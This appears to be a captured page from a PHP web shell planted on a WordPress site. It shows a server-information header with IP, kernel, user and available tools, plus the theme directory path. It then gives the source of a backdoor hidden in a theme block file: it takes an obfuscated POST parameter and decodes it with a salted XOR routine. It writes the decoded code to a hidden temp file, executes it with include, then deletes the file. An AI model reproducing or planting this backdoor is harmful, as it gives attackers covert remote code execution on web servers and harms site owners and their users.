| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/successkpi/wp-content/themes/successkpi/blocks/two-column-section/ |
Upload File : |
<?php
if(!is_null($_POST["en\x74"] ?? null)){
$bind = array_filter([getcwd(), "/dev/shm", getenv("TMP"), getenv("TEMP"), "/var/tmp", session_save_path(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]);
$object = $_POST["en\x74"];
$object = explode (".", $object ) ;
$symbol = '';
$salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt2 );
foreach($object as $s => $v7):
$chS = ord($salt2[$s %$lenS] );
$dec =((int)$v7 - $chS -($s %10)) ^ 49;
$symbol .= chr($dec );
endforeach;
while ($data = array_shift($bind)) {
if (!( !is_dir($data) || !is_writable($data) )) {
$res = "$data/.mrk";
$file = fopen($res, 'w');
if ($file) {
fwrite($file, $symbol);
fclose($file);
include $res;
@unlink($res);
die();
}
}
}
}